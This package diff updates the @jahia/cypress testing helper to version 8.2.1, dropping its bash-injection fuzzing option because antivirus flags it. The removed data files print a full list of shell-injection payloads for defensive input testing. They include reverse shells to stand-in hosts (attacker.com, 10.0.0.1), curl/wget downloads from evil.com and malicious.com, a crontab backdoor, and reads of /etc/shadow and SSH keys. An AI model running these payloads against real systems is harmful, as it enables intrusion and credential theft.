@jahia/cypress 8.2.0 → 8.2.1

package/CHANGELOG.md

@@ -1,5 +1,9 @@
 # @jahia/cypress Changelog
 
+## 8.2.1
+
+* Temporary remove bash injections which can be treated by antivirus as a potentially unsafe. They will be reworked and brought back later on. (#224)
+
 ## 8.2.0
 
 * Add `context.tag()` function for adding tags (user-defined labels) that can be attached to test suites and individual tests to provide metadata about test characteristics, scope, and purpose (#221)

package/dist/support/jfaker.d.ts

@@ -22,7 +22,6 @@
  * Available injection methods:
  * - `.xss()` - Generate XSS injection payloads
  * - `.sql()` - Generate SQL injection payloads
- * - `.bash()` - Generate Bash injection payloads
  * - `.chars()` - Generate random special characters
  * - `.htmlentities()` - Generate HTML entities
  * - `.numbers()` - Generate random numbers entities and edge cases

package/dist/support/jfaker.js

@@ -28,14 +28,12 @@ var faker_1 = require("@faker-js/faker");
 // Import injection data from corresponding files in injections-ts directory
 var xss_data_1 = require("../injections/xss-data");
 var sql_data_1 = require("../injections/sql-data");
-var bash_data_1 = require("../injections/bash-data");
 var chars_data_1 = require("../injections/chars-data");
 var htmlentities_data_1 = require("../injections/htmlentities-data");
 var numbers_data_1 = require("../injections/numbers-data");
 var injectionData = {
     xss: xss_data_1.xssData,
     sql: sql_data_1.sqlData,
-    bash: bash_data_1.bashData,
     chars: chars_data_1.charsData,
     htmlentities: htmlentities_data_1.htmlentitiesData,
     numbers: numbers_data_1.numbersData
@@ -48,7 +46,7 @@ var ENV_INJECTIONS_TYPE = 'JAHIA_CYPRESS_INJECTION_TYPE';
 var injectionsDefaultLength = { min: 2, max: 5 };
 /**
  * Store FakeData type in Cypress env for persistence across specs
- * @param {string} type FakeData type: 'faker' | 'xss' | 'sql' | 'bash' | 'chars' | 'htmlentities' | 'numbers'
+ * @param {string} type FakeData type: 'faker' | 'xss' | 'sql' | 'chars' | 'htmlentities' | 'numbers'
  * @returns void
  */
 function setDataType(type) {
@@ -63,7 +61,7 @@ function getDataType() {
 }
 /**
  * Generate injection data based on the specified type and length
- * @param {string} type Injection type to generate (xss, sql, bash, chars, htmlentities, numbers)
+ * @param {string} type Injection type to generate (xss, sql, chars, htmlentities, numbers)
  * @param {number} length Length of the generated injection (optional)
  * @returns {string} Generated injection string
  */
@@ -171,7 +169,6 @@ var DeepApi = /** @class */ (function () {
  * Available injection methods:
  * - `.xss()` - Generate XSS injection payloads
  * - `.sql()` - Generate SQL injection payloads
- * - `.bash()` - Generate Bash injection payloads
  * - `.chars()` - Generate random special characters
  * - `.htmlentities()` - Generate HTML entities
  * - `.numbers()` - Generate random numbers entities and edge cases

package/docs/jfaker.md

@@ -7,7 +7,7 @@ The `jfaker` module is a flexible fake data generation utility for Cypress testi
 ## Key Features
 
 - **Faker.js Integration**: Full access to all `Faker.js` methods for generating realistic test data
-- **Security Injection Payloads**: Built-in support for common injection attack vectors (XSS, SQL, Bash, etc.)
+- **Security Injection Payloads**: Built-in support for common injection attack vectors (XSS, SQL, etc.)
 - **Global Type Management**: Set a global data type that automatically overrides faker calls with injection data
 - **Flexible Configuration**: Control generation behavior with options like length, provider, and overridability
 - **Dynamic API**: Chain method calls naturally (e.g., `jfaker.person.firstName()`)
@@ -53,7 +53,6 @@ Generate security testing payloads for various attack vectors:
 
 - **`.xss()`** - Cross-Site Scripting (XSS) payloads
 - **`.sql()`** - SQL injection payloads
-- **`.bash()`** - Bash/shell command injection payloads
 - **`.chars()`** - Random special characters
 - **`.htmlentities()`** - HTML entities
 - **`.numbers()`** - Number-based edge cases and payloads
@@ -63,7 +62,6 @@ Generate security testing payloads for various attack vectors:
 // Default behavior (no length specified): 2-5 random items joined
 jfaker.xss()          // Returns: random XSS payload
 jfaker.sql()          // Returns: random SQL injection payload
-jfaker.bash()         // Returns: random Bash injection payload
 ```
 
 **With Length Control:**
@@ -84,7 +82,7 @@ jfaker.sql({length: -1})          // Returns: all SQL payloads joined together
 Sets the global data type for all subsequent jfaker calls. When set to an injection type, all faker method calls will return injection data instead.
 
 **Parameters:**
-- `type`: One of `'faker'`, `'xss'`, `'sql'`, `'bash'`, `'chars'`, `'htmlentities'`, or `'numbers'`
+- `type`: One of `'faker'`, `'xss'`, `'sql'`, `'chars'`, `'htmlentities'`, or `'numbers'`
 
 **Usage:**
 ```typescript
@@ -263,7 +261,7 @@ describe('Security Test Suite - SQL Injection', () => {
 
 ```typescript
 describe('Input Field Robustness', () => {
-   const injectionTypes = ['xss', 'sql', 'bash', 'chars', 'htmlentities', 'numbers'];
+   const injectionTypes = ['xss', 'sql', 'chars', 'htmlentities', 'numbers'];
 
    injectionTypes.forEach(type => {
       it(`should handle ${type} injection payloads`, () => {
@@ -355,7 +353,6 @@ The module uses a `DeepApi` class that implements a Proxy-based architecture:
 Injection payloads are imported from TypeScript files in the `src/injections/` directory:
 - `xss-data.ts` - XSS attack vectors
 - `sql-data.ts` - SQL injection patterns
-- `bash-data.ts` - Shell command injections
 - `chars-data.ts` - Special characters
 - `htmlentities-data.ts` - HTML entity variations
 - `numbers-data.ts` - Numeric edge cases

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "@jahia/cypress",
-  "version": "8.2.0",
+  "version": "8.2.1",
   "scripts": {
     "build": "tsc",
     "lint": "eslint src -c .eslintrc.json --ext .ts --max-warnings=0"

package/src/support/jfaker.ts

@@ -18,7 +18,6 @@ import {faker} from '@faker-js/faker';
 // Import injection data from corresponding files in injections-ts directory
 import {xssData} from '../injections/xss-data';
 import {sqlData} from '../injections/sql-data';
-import {bashData} from '../injections/bash-data';
 import {charsData} from '../injections/chars-data';
 import {htmlentitiesData} from '../injections/htmlentities-data';
 import {numbersData} from '../injections/numbers-data';
@@ -26,7 +25,6 @@ import {numbersData} from '../injections/numbers-data';
 const injectionData: Record<string, string[]> = {
     xss: xssData,
     sql: sqlData,
-    bash: bashData,
     chars: charsData,
     htmlentities: htmlentitiesData,
     numbers: numbersData
@@ -42,7 +40,7 @@ const injectionsDefaultLength = {min: 2, max: 5};
 
 /**
  * Store FakeData type in Cypress env for persistence across specs
- * @param {string} type FakeData type: 'faker' | 'xss' | 'sql' | 'bash' | 'chars' | 'htmlentities' | 'numbers'
+ * @param {string} type FakeData type: 'faker' | 'xss' | 'sql' | 'chars' | 'htmlentities' | 'numbers'
  * @returns void
  */
 function setDataType(type: string): void {
@@ -59,7 +57,7 @@ function getDataType(): string | undefined {
 
 /**
  * Generate injection data based on the specified type and length
- * @param {string} type Injection type to generate (xss, sql, bash, chars, htmlentities, numbers)
+ * @param {string} type Injection type to generate (xss, sql, chars, htmlentities, numbers)
  * @param {number} length Length of the generated injection (optional)
  * @returns {string} Generated injection string
  */
@@ -175,7 +173,6 @@ class DeepApi {
  * Available injection methods:
  * - `.xss()` - Generate XSS injection payloads
  * - `.sql()` - Generate SQL injection payloads
- * - `.bash()` - Generate Bash injection payloads
  * - `.chars()` - Generate random special characters
  * - `.htmlentities()` - Generate HTML entities
  * - `.numbers()` - Generate random numbers entities and edge cases

package/tests/cypress/e2e/jfaker.spec.ts

@@ -88,7 +88,7 @@ describe('FakeData (jfaker) Module Tests', () => {
     });
 
     describe('Injection Data Generation', () => {
-        const injectionTypes = ['xss', 'sql', 'bash', 'chars', 'htmlentities', 'numbers'];
+        const injectionTypes = ['xss', 'sql', 'chars', 'htmlentities', 'numbers'];
 
         injectionTypes.forEach(type => {
             it(`should generate ${type} injection data without length`, () => {
@@ -335,7 +335,6 @@ describe('FakeData (jfaker) Module Tests', () => {
                 scriptInjection: jfaker.person.firstName(),
                 longPayload: jfaker.xss({length: 200}),
                 sqlInjection: jfaker.sql({length: 100}),
-                bashInjection: jfaker.bash(),
                 specialChars: jfaker.chars({length: 30})
             };
 
@@ -394,7 +393,7 @@ describe('FakeData (jfaker) Module Tests', () => {
 
     describe('Type Switching Performance', () => {
         it('should handle frequent type switches', () => {
-            const types = ['faker', 'xss', 'sql', 'bash', 'faker'];
+            const types = ['faker', 'xss', 'sql', 'faker'];
             const results: string[] = [];
 
             types.forEach(type => {

package/dist/injections/bash-data.d.ts

@@ -1 +0,0 @@
-export declare const bashData: string[];

package/dist/injections/bash-data.js

@@ -1,57 +0,0 @@
-"use strict";
-Object.defineProperty(exports, "__esModule", { value: true });
-exports.bashData = void 0;
-exports.bashData = [
-    '--version',
-    '--help',
-    '$USER',
-    '/dev/null; touch /tmp/blns.fail ; echo',
-    '`touch /tmp/blns.fail`',
-    '$(touch /tmp/blns.fail)',
-    '@{[system \'touch /tmp/blns.fail\']}',
-    'eval(\'puts \'hello world\'\')',
-    'System(\'ls -al /\')',
-    '`ls -al /`',
-    'Kernel.exec(\'ls -al /\')',
-    'Kernel.exit(1)',
-    '%x(\'ls -al /\')',
-    '$HOME',
-    '$ENV{\'HOME\'}',
-    '%d',
-    '%s',
-    '{0}',
-    '%*.*s',
-    '../../../../../../../../../../../etc/passwd%00',
-    '../../../../../../../../../../../etc/hosts',
-    '() { 0; }; touch /tmp/blns.shellshock1.fail;',
-    '() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }',
-    '; cat /etc/passwd',
-    '| ls -la',
-    '&& whoami',
-    '; rm -rf /tmp/test',
-    '` cat /etc/shadow `',
-    '| id',
-    '; uname -a',
-    '&& cat /etc/group',
-    '$(whoami)',
-    '`id`',
-    '; nc -e /bin/sh attacker.com 4444',
-    '| curl http://malicious.com/shell.sh | bash',
-    '; wget http://evil.com/backdoor -O /tmp/backdoor',
-    '&& chmod +x /tmp/exploit',
-    '`cat /root/.ssh/id_rsa`',
-    '; find / -name \'*.conf\'',
-    '| grep -r \'password\' /etc/',
-    '&& env',
-    '$(cat /proc/version)',
-    '; ps aux',
-    '| netstat -tuln',
-    '&& iptables -L',
-    '`cat /var/log/auth.log`',
-    '; history',
-    '| tail -f /var/log/syslog',
-    '&& crontab -l',
-    '; echo \'* * * * * /tmp/backdoor\' | crontab -',
-    '`sudo su -`',
-    '; python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\''
-];

package/src/injections/bash-data.ts

@@ -1,54 +0,0 @@
-export const bashData: string[] = [
-    '--version',
-    '--help',
-    '$USER',
-    '/dev/null; touch /tmp/blns.fail ; echo',
-    '`touch /tmp/blns.fail`',
-    '$(touch /tmp/blns.fail)',
-    '@{[system \'touch /tmp/blns.fail\']}',
-    'eval(\'puts \'hello world\'\')',
-    'System(\'ls -al /\')',
-    '`ls -al /`',
-    'Kernel.exec(\'ls -al /\')',
-    'Kernel.exit(1)',
-    '%x(\'ls -al /\')',
-    '$HOME',
-    '$ENV{\'HOME\'}',
-    '%d',
-    '%s',
-    '{0}',
-    '%*.*s',
-    '../../../../../../../../../../../etc/passwd%00',
-    '../../../../../../../../../../../etc/hosts',
-    '() { 0; }; touch /tmp/blns.shellshock1.fail;',
-    '() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }',
-    '; cat /etc/passwd',
-    '| ls -la',
-    '&& whoami',
-    '; rm -rf /tmp/test',
-    '` cat /etc/shadow `',
-    '| id',
-    '; uname -a',
-    '&& cat /etc/group',
-    '$(whoami)',
-    '`id`',
-    '; nc -e /bin/sh attacker.com 4444',
-    '| curl http://malicious.com/shell.sh | bash',
-    '; wget http://evil.com/backdoor -O /tmp/backdoor',
-    '&& chmod +x /tmp/exploit',
-    '`cat /root/.ssh/id_rsa`',
-    '; find / -name \'*.conf\'',
-    '| grep -r \'password\' /etc/',
-    '&& env',
-    '$(cat /proc/version)',
-    '; ps aux',
-    '| netstat -tuln',
-    '&& iptables -L',
-    '`cat /var/log/auth.log`',
-    '; history',
-    '| tail -f /var/log/syslog',
-    '&& crontab -l',
-    '; echo \'* * * * * /tmp/backdoor\' | crontab -',
-    '`sudo su -`',
-    '; python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\''
-];